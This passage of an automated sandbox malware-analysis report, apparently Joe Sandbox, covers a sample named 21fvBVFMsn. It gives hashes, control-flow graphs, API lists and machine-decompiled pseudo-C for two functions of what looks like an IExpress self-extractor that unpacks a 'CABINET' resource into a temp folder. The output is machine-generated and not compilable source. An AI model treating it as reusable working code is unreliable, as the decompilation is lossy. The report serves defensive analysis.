                                                                                                                                                                                                                                            • Opcode ID: 758131ece2fdc758bdd836d127b2a9f2072460e7a4b4a8918e8470628340b43b
                                                                                                                                                                                                                                            • Instruction ID: c69615aa332e1947a8a9d17218cbb0633b31a91740aa4b5735e02933eb488f45
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 758131ece2fdc758bdd836d127b2a9f2072460e7a4b4a8918e8470628340b43b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F71A2B990060CAFEB25DBA4DC85BFB77BCEBC9344F0441A9F40592141EB719E868B21
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 374 a44fe0-a4501a call a4468f FindResourceA LoadResource LockResource 377 a45020-a45027 374->377 378 a45161-a45163 374->378 379 a45057-a4505e call a44efd 377->379 380 a45029-a45051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 a45060-a45077 call a444b9 379->383 384 a4507c-a450b4 379->384 380->379 388 a45107-a4510e 383->388 389 a450b6-a450da 384->389 390 a450e8-a45104 call a444b9 384->390 392 a45110-a45117 FreeResource 388->392 393 a4511d-a4511f 388->393 400 a45106 389->400 401 a450dc 389->401 390->400 392->393 396 a45121-a45127 393->396 397 a4513a-a45141 393->397 396->397 402 a45129-a45135 call a444b9 396->402 398 a45143-a4514a 397->398 399 a4515f 397->399 398->399 403 a4514c-a45159 SendMessageA 398->403 399->378 400->388 405 a450e3-a450e6 401->405 402->397 403->399 405->390 405->400
                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E00A44FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                                            				struct HWND__* _t9;
                                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            				struct HWND__* _t27;
                                                                                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                                            				int _t34;
                                                                                                                                                                                                                                            				CHAR* _t36;
                                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                                            				intOrPtr _t47;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                                            				_t36 = "CABINET";
                                                                                                                                                                                                                                            				 *0xa49144 = E00A4468F(_t36, 0, 0);
                                                                                                                                                                                                                                            				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                            				 *0xa49140 = _t8;
                                                                                                                                                                                                                                            				if(_t8 == 0) {
                                                                                                                                                                                                                                            					return _t8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t9 =  *0xa48584; // 0x0
                                                                                                                                                                                                                                            				if(_t9 != 0) {
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                            					ShowWindow(GetDlgItem( *0xa48584, 0x841), 5); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t10 = E00A44EFD(0, 0); // executed
                                                                                                                                                                                                                                            				if(_t10 != 0) {
                                                                                                                                                                                                                                            					__imp__#20(E00A44CA0, E00A44CC0, E00A44980, E00A44A50, E00A44AD0, E00A44B60, E00A44BC0, 1, 0xa49148, _t33);
                                                                                                                                                                                                                                            					_t34 = _t10;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						_t29 =  *0xa49148; // 0x0
                                                                                                                                                                                                                                            						_t24 =  *0xa48584; // 0x0
                                                                                                                                                                                                                                            						E00A444B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						_t37 = 0;
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#22(_t34, "*MEMCAB", 0xa41140, 0, E00A44CD0, 0, 0xa49140); // executed
                                                                                                                                                                                                                                            					_t37 = _t10;
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                            					if(_t10 != 0) {
                                                                                                                                                                                                                                            						goto L9;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t27 =  *0xa48584; // 0x0
                                                                                                                                                                                                                                            					E00A444B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t37 = 0;
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_t12 =  *0xa49140; // 0x0
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						FreeResource(_t12);
                                                                                                                                                                                                                                            						 *0xa49140 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t37 == 0) {
                                                                                                                                                                                                                                            						_t47 =  *0xa491d8; // 0x0
                                                                                                                                                                                                                                            						if(_t47 == 0) {
                                                                                                                                                                                                                                            							E00A444B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(( *0xa48a38 & 0x00000001) == 0 && ( *0xa49a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                            						SendMessageA( *0xa48584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					return _t37;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                            0x00a44fe0
                                                                                                                                                                                                                                            0x00a44fe6
                                                                                                                                                                                                                                            0x00a44ff9
                                                                                                                                                                                                                                            0x00a4500d
                                                                                                                                                                                                                                            0x00a45013
                                                                                                                                                                                                                                            0x00a4501a
                                                                                                                                                                                                                                            0x00a45163
                                                                                                                                                                                                                                            0x00a45163
                                                                                                                                                                                                                                            0x00a45020
                                                                                                                                                                                                                                            0x00a45027
                                                                                                                                                                                                                                            0x00a45037
                                                                                                                                                                                                                                            0x00a45051
                                                                                                                                                                                                                                            0x00a45051
                                                                                                                                                                                                                                            0x00a45057
                                                                                                                                                                                                                                            0x00a4505e
                                                                                                                                                                                                                                            0x00a450a7
                                                                                                                                                                                                                                            0x00a450ad
                                                                                                                                                                                                                                            0x00a450b4
                                                                                                                                                                                                                                            0x00a450e8
                                                                                                                                                                                                                                            0x00a450e8
                                                                                                                                                                                                                                            0x00a450ee
                                                                                                                                                                                                                                            0x00a450ff
                                                                                                                                                                                                                                            0x00a45104
                                                                                                                                                                                                                                            0x00a45106
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45106
                                                                                                                                                                                                                                            0x00a450cd
                                                                                                                                                                                                                                            0x00a450d3
                                                                                                                                                                                                                                            0x00a450da
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a450dd
                                                                                                                                                                                                                                            0x00a450e6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45060
                                                                                                                                                                                                                                            0x00a45060
                                                                                                                                                                                                                                            0x00a45070
                                                                                                                                                                                                                                            0x00a45075
                                                                                                                                                                                                                                            0x00a45107
                                                                                                                                                                                                                                            0x00a45107
                                                                                                                                                                                                                                            0x00a4510e
                                                                                                                                                                                                                                            0x00a45111
                                                                                                                                                                                                                                            0x00a45117
                                                                                                                                                                                                                                            0x00a45117
                                                                                                                                                                                                                                            0x00a4511f
                                                                                                                                                                                                                                            0x00a45121
                                                                                                                                                                                                                                            0x00a45127
                                                                                                                                                                                                                                            0x00a45135
                                                                                                                                                                                                                                            0x00a45135
                                                                                                                                                                                                                                            0x00a45127
                                                                                                                                                                                                                                            0x00a45141
                                                                                                                                                                                                                                            0x00a45159
                                                                                                                                                                                                                                            0x00a45159
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4515f

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00A44FFE
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 00A45006
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 00A4500D
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000000,00000842), ref: 00A45030
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00A45037
                                                                                                                                                                                                                                            • GetDlgItem.USER32(00000841,00000005), ref: 00A4504A
                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00A45051
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00A45111
                                                                                                                                                                                                                                            • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00A45159
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                            • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                            • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                            • Opcode ID: e95cea3d6dfbc7bedf85ce9cb1817e736b51bf36ed696bf718cfb607c8651fdf
                                                                                                                                                                                                                                            • Instruction ID: a329714e4c8b016239917039efb7f0df3ce371d1643d3fe9bc3309e7faa135c4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e95cea3d6dfbc7bedf85ce9cb1817e736b51bf36ed696bf718cfb607c8651fdf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A313DBCB807017FE720DBF9BD89F67365CB7CA745F140624F901A21A2DBB68C128651
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 450 a42f1d-a42f3d 451 a42f6c-a42f73 call a45164 450->451 452 a42f3f-a42f46 450->452 461 a43041 451->461 462 a42f79-a42f80 call a455a0 451->462 454 a42f5f-a42f66 call a43a3f 452->454 455 a42f48 call a451e5 452->455 454->451 454->461 459 a42f4d-a42f4f 455->459 459->461 463 a42f55-a42f5d 459->463 465 a43043-a43053 call a46ce0 461->465 462->461 469 a42f86-a42fbe GetSystemDirectoryA call a4658a LoadLibraryA 462->469 463->451 463->454 472 a42ff7-a43004 FreeLibrary 469->472 473 a42fc0-a42fd4 GetProcAddress 469->473 474 a43006-a4300c 472->474 475 a43017-a43024 SetCurrentDirectoryA 472->475 473->472 476 a42fd6-a42fee DecryptFileA 473->476 474->475 477 a4300e call a4621e 474->477 478 a43054-a4305a 475->478 479 a43026-a4303c call a444b9 call a46285 475->479 476->472 485 a42ff0-a42ff5 476->485 489 a43013-a43015 477->489 481 a43065-a4306c 478->481 482 a4305c call a43b26 478->482 479->461 487 a4307c-a43089 481->487 488 a4306e-a43075 call a4256d 481->488 491 a43061-a43063 482->491 485->472 493 a430a1-a430a9 487->493 494 a4308b-a43091 487->494 498 a4307a 488->498 489->461 489->475 491->461 491->481 496 a430b4-a430b7 493->496 497 a430ab-a430ad 493->497 494->493 499 a43093 call a43ba2 494->499 496->465 497->496 501 a430af call a44169 497->501 498->487 504 a43098-a4309a 499->504 501->496 504->461 505 a4309c 504->505 505->493
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A42F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				signed int _t22;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t43 = __edx;
                                                                                                                                                                                                                                            				_t9 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                            				if( *0xa48a38 != 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					_t11 = E00A45164(_t52);
                                                                                                                                                                                                                                            					_t53 = _t11;
                                                                                                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_t12 = 0;
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						return E00A46CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t14 = E00A455A0(_t53); // executed
                                                                                                                                                                                                                                            					if(_t14 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t45 = 0x105;
                                                                                                                                                                                                                                            						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                            						_t43 = 0x105;
                                                                                                                                                                                                                                            						_t40 =  &_v272;
                                                                                                                                                                                                                                            						E00A4658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                            						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                            						_t44 = 0;
                                                                                                                                                                                                                                            						if(_t36 != 0) {
                                                                                                                                                                                                                                            							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                            							_v276 = _t31;
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								_t45 = _t47;
                                                                                                                                                                                                                                            								_t40 = _t31;
                                                                                                                                                                                                                                            								 *0xa4a288("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                                                                                                                                                                                                            								_v276();
                                                                                                                                                                                                                                            								if(_t47 != _t47) {
                                                                                                                                                                                                                                            									_t40 = 4;
                                                                                                                                                                                                                                            									asm("int 0x29");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						FreeLibrary(_t36);
                                                                                                                                                                                                                                            						_t58 =  *0xa48a24 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t58 != 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                                                                                                                                                                                                            							if(_t21 != 0) {
                                                                                                                                                                                                                                            								__eflags =  *0xa48a2c - _t44; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									__eflags =  *0xa48d48 & 0x000000c0;
                                                                                                                                                                                                                                            									if(( *0xa48d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            										_t41 =  *0xa49a40; // 0x3, executed
                                                                                                                                                                                                                                            										_t26 = E00A4256D(_t41); // executed
                                                                                                                                                                                                                                            										_t44 = _t26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t22 =  *0xa48a24; // 0x0
                                                                                                                                                                                                                                            									 *0xa49a44 = _t44;
                                                                                                                                                                                                                                            									__eflags = _t22;
                                                                                                                                                                                                                                            									if(_t22 != 0) {
                                                                                                                                                                                                                                            										L26:
                                                                                                                                                                                                                                            										__eflags =  *0xa48a38;
                                                                                                                                                                                                                                            										if( *0xa48a38 == 0) {
                                                                                                                                                                                                                                            											__eflags = _t22;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												E00A44169(__eflags);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t12 = 1;
                                                                                                                                                                                                                                            										goto L17;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags =  *0xa49a30 - _t22; // 0x0
                                                                                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                                                                                            											goto L26;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t25 = E00A43BA2(); // executed
                                                                                                                                                                                                                                            										__eflags = _t25;
                                                                                                                                                                                                                                            										if(_t25 == 0) {
                                                                                                                                                                                                                                            											goto L16;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t22 =  *0xa48a24; // 0x0
                                                                                                                                                                                                                                            										goto L26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t27 = E00A43B26(_t40, _t44);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t43 = 0x4bc;
                                                                                                                                                                                                                                            							E00A444B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                            							 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t59 =  *0xa49a30 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t59 != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E00A4621E(); // executed
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t49 =  *0xa48a24;
                                                                                                                                                                                                                                            				if( *0xa48a24 != 0) {
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					_t34 = E00A43A3F(_t51);
                                                                                                                                                                                                                                            					_t52 = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E00A451E5(_t49) == 0) {
                                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t51 =  *0xa48a38;
                                                                                                                                                                                                                                            				if( *0xa48a38 != 0) {
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x00a42f1d
                                                                                                                                                                                                                                            0x00a42f28
                                                                                                                                                                                                                                            0x00a42f2f
                                                                                                                                                                                                                                            0x00a42f3d
                                                                                                                                                                                                                                            0x00a42f6c
                                                                                                                                                                                                                                            0x00a42f6c
                                                                                                                                                                                                                                            0x00a42f71
                                                                                                                                                                                                                                            0x00a42f73
                                                                                                                                                                                                                                            0x00a43041
                                                                                                                                                                                                                                            0x00a43041
                                                                                                                                                                                                                                            0x00a43043
                                                                                                                                                                                                                                            0x00a43053
                                                                                                                                                                                                                                            0x00a43053
                                                                                                                                                                                                                                            0x00a42f79
                                                                                                                                                                                                                                            0x00a42f80
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42f86
                                                                                                                                                                                                                                            0x00a42f86
                                                                                                                                                                                                                                            0x00a42f93
                                                                                                                                                                                                                                            0x00a42f9e
                                                                                                                                                                                                                                            0x00a42fa0
                                                                                                                                                                                                                                            0x00a42fa6
                                                                                                                                                                                                                                            0x00a42fb8
                                                                                                                                                                                                                                            0x00a42fba
                                                                                                                                                                                                                                            0x00a42fbe
                                                                                                                                                                                                                                            0x00a42fc6
                                                                                                                                                                                                                                            0x00a42fcc
                                                                                                                                                                                                                                            0x00a42fd4
                                                                                                                                                                                                                                            0x00a42fd6
                                                                                                                                                                                                                                            0x00a42fd8
                                                                                                                                                                                                                                            0x00a42fe0
                                                                                                                                                                                                                                            0x00a42fe6
                                                                                                                                                                                                                                            0x00a42fee
                                                                                                                                                                                                                                            0x00a42ff0
                                                                                                                                                                                                                                            0x00a42ff5
                                                                                                                                                                                                                                            0x00a42ff5
                                                                                                                                                                                                                                            0x00a42fee
                                                                                                                                                                                                                                            0x00a42fd4
                                                                                                                                                                                                                                            0x00a42ff8
                                                                                                                                                                                                                                            0x00a42ffe
                                                                                                                                                                                                                                            0x00a43004
                                                                                                                                                                                                                                            0x00a43017
                                                                                                                                                                                                                                            0x00a4301c
                                                                                                                                                                                                                                            0x00a43024
                                                                                                                                                                                                                                            0x00a43054
                                                                                                                                                                                                                                            0x00a4305a
                                                                                                                                                                                                                                            0x00a43065
                                                                                                                                                                                                                                            0x00a43065
                                                                                                                                                                                                                                            0x00a4306c
                                                                                                                                                                                                                                            0x00a4306e
                                                                                                                                                                                                                                            0x00a43075
                                                                                                                                                                                                                                            0x00a4307a
                                                                                                                                                                                                                                            0x00a4307a
                                                                                                                                                                                                                                            0x00a4307c
                                                                                                                                                                                                                                            0x00a43081
                                                                                                                                                                                                                                            0x00a43087
                                                                                                                                                                                                                                            0x00a43089
                                                                                                                                                                                                                                            0x00a430a1
                                                                                                                                                                                                                                            0x00a430a1
                                                                                                                                                                                                                                            0x00a430a9
                                                                                                                                                                                                                                            0x00a430ab
                                                                                                                                                                                                                                            0x00a430ad
                                                                                                                                                                                                                                            0x00a430af
                                                                                                                                                                                                                                            0x00a430af
                                                                                                                                                                                                                                            0x00a430ad
                                                                                                                                                                                                                                            0x00a430b6
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4308b
                                                                                                                                                                                                                                            0x00a4308b
                                                                                                                                                                                                                                            0x00a43091
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43093
                                                                                                                                                                                                                                            0x00a43098
                                                                                                                                                                                                                                            0x00a4309a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4309c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4309c
                                                                                                                                                                                                                                            0x00a43089
                                                                                                                                                                                                                                            0x00a4305c
                                                                                                                                                                                                                                            0x00a43061
                                                                                                                                                                                                                                            0x00a43063
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43063
                                                                                                                                                                                                                                            0x00a4302b
                                                                                                                                                                                                                                            0x00a43032
                                                                                                                                                                                                                                            0x00a4303c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4303c
                                                                                                                                                                                                                                            0x00a43006
                                                                                                                                                                                                                                            0x00a4300c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4300e
                                                                                                                                                                                                                                            0x00a43015
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a43015
                                                                                                                                                                                                                                            0x00a42f80
                                                                                                                                                                                                                                            0x00a42f3f
                                                                                                                                                                                                                                            0x00a42f46
                                                                                                                                                                                                                                            0x00a42f5f
                                                                                                                                                                                                                                            0x00a42f5f
                                                                                                                                                                                                                                            0x00a42f64
                                                                                                                                                                                                                                            0x00a42f66
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42f66
                                                                                                                                                                                                                                            0x00a42f4f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42f55
                                                                                                                                                                                                                                            0x00a42f5d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A42F93
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A42FB2
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A42FC6
                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 00A42FE6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00A42FF8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A4301C
                                                                                                                                                                                                                                              • Part of subcall function 00A451E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A42F4D,?,00000002,00000000), ref: 00A45201
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
